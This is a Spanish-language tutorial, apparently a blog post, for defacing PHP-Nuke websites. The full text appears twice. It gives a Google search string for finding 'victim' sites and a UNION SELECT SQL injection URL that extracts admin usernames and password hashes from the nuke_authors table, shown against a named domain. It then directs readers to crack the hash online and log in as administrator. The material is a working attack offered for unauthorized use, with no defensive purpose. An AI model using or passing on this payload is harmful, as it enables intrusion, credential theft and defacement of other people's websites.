todo tipo de trucos
Hackear Php Mediante SQl inyeccion.
--------------------------------------------------------------------------------
Bueno este es un minituto tambien para realizar un deface a php nuke mediante la inyeccion sql.
-Bueno estos son los pasos a seguir:
Primero vamos a google y ponemos lo siguiente:
modules.php?name=Statistics Version PHP-Nuke
ese codigo es para buscar las paginas victimas en php usando el google.
-Despues elegimos la pagina q creamos q sea vulnerable para la inyeccion sql solo es de ir intentando.
-Ok seguimos ya q entramos a la pagina ponemos la inyeccion sql despues de la direccion Url
Esta es la inyeccion sql:
modules.php?name=Search&type=comments&%20%20%20que ry=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
-OK a la hora de aplicarla nos quedaria algo como asi:
http://www.vliegerdomein.ar/modules.php?name=Search&type=comments&%20%20%20que ry=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
Despues de hacer esto abajo nos dar el pass del admin y el hash encryptado de la contraseņa.
si la inyeccion sql nos sirve nos daria algo como asi:
8b42c57fd1a91d914ef0c93da52567396
Geplaatst door HelpDesk op Thursday 01 January @ 0059 GMT+1
Aan artikel toegevoegd:
8b42c57fd1a91d914ef0c93da5256739 este seria el hash encryptado
y HelpDesk seria el nombre de usuario del admin.
-OK-Ya que tenemos esto nos vamos al siguiente paso el de crackear el hash 8b42c57fd1a91d914ef0c93da5256739
Esto lo podemos hacer en una pagina para crackear hashs.
Esta pag es buena para hacer eso milw0rm.com - free md5/lm hash cracking
Una ves q nos crackea el hash nos da la contraseņa real del admin ahora nos vamos a la pag q nos sirvio la inyeccion nos vamos al area de login y ponemos el nombre de usuario y la contraseņa y listo a jugar con la pagina.
Bueno me cuentan como les fue.
SaLuDoS.....
--------------------------------------------------------------------------------
Bueno este es un minituto tambien para realizar un deface a php nuke mediante la inyeccion sql.
-Bueno estos son los pasos a seguir:
Primero vamos a google y ponemos lo siguiente:
modules.php?name=Statistics Version PHP-Nuke
ese codigo es para buscar las paginas victimas en php usando el google.
-Despues elegimos la pagina q creamos q sea vulnerable para la inyeccion sql solo es de ir intentando.
-Ok seguimos ya q entramos a la pagina ponemos la inyeccion sql despues de la direccion Url
Esta es la inyeccion sql:
modules.php?name=Search&type=comments&%20%20%20que ry=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
-OK a la hora de aplicarla nos quedaria algo como asi:
http://www.vliegerdomein.ar/modules.php?name=Search&type=comments&%20%20%20que ry=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
Despues de hacer esto abajo nos dar el pass del admin y el hash encryptado de la contraseņa.
si la inyeccion sql nos sirve nos daria algo como asi:
8b42c57fd1a91d914ef0c93da52567396
Geplaatst door HelpDesk op Thursday 01 January @ 0059 GMT+1
Aan artikel toegevoegd:
8b42c57fd1a91d914ef0c93da5256739 este seria el hash encryptado
y HelpDesk seria el nombre de usuario del admin.
-OK-Ya que tenemos esto nos vamos al siguiente paso el de crackear el hash 8b42c57fd1a91d914ef0c93da5256739
Esto lo podemos hacer en una pagina para crackear hashs.
Esta pag es buena para hacer eso milw0rm.com - free md5/lm hash cracking
Una ves q nos crackea el hash nos da la contraseņa real del admin ahora nos vamos a la pag q nos sirvio la inyeccion nos vamos al area de login y ponemos el nombre de usuario y la contraseņa y listo a jugar con la pagina.
Bueno me cuentan como les fue.
SaLuDoS.....
Tags: pagina web